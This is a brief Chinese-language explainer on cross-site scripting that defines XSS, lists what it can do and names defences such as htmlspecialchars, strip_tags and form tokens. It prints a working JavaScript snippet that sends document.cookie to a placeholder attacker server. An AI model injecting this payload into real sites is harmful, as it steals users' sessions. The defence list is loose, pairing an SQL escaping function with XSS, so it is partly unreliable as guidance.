XSS又称CSS,全称CrossSiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。
xss攻击能做什么
- 窃取cookies,读取目标网站的cookie发送到黑客的服务器上,如下面的代码:
var i=document.createElement(“img”);
document.body.appendChild(i);
i.src =”http://www.hackerserver.com/?c=” + document.cookie;- 读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等。
- 前面两个是读的操作,其实还可进行写的操作,比如说:删除用户的博客,转发指定的微博,向用户的联系人发送带有恶意代码的信息,进行下一步的传播。
防御攻击
mysql_real_escape_string 函数转义 SQL 语句中使用的字符串中的特殊字符。
htmlspecialchars 函数把预定义的字符转换为 HTML 实体。
strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。- 跨站伪装访问预防:
a. 客户端加随机值 表单加token传值
b. 增加验证码
2346
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
